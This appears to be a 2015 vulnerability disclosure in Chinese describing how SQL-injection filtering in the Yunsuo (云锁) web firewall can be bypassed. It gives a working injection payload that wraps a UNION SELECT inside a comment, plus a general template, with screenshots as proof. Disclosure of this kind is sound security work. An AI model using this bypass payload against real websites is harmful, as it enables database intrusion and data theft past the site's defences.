### 简要描述:
先来一发
### 详细说明:
payload:
http://**.**.**.**/?id=/*' union select 1,2 from users%23*/
过程参考我发的安全狗那个http://**.**.**.**/bugs/wooyun-2015-0163141
效果:
完全无视sql注入策略
使用这样的语句:
http://**.**.**.**/?id=/*' xxxxxxxxxx %23*/
中间xxx任意注入,可以完全bypass
[<img src="https://images.seebug.org/upload/201512/211301447559d8a27db7cfa709359f3f11952229.png" alt="屏幕快照 2015-12-21 下午1.01.34.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/211301447559d8a27db7cfa709359f3f11952229.png)
### 漏洞证明:
本地下载了最新版云锁,开启了sql注入的防御
[<img src="https://images.seebug.org/upload/201512/211649462ab4b4b6ffaf979796dbc2b9649f7abe.png" alt="屏幕快照 2015-12-21 下午4.47.43.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/211649462ab4b4b6ffaf979796dbc2b9649f7abe.png)
测一下
[<img src="https://images.seebug.org/upload/201512/21165014b9e1645b5276cba09c247449481bf186.png" alt="屏幕快照 2015-12-21 下午4.45.25.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/21165014b9e1645b5276cba09c247449481bf186.png)
bypass
[<img src="https://images.seebug.org/upload/201512/211650387cacd2ba0fa859d7dadcd9d596ccc476.png" alt="屏幕快照 2015-12-21 下午4.46.24.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/211650387cacd2ba0fa859d7dadcd9d596ccc476.png)
暂无评论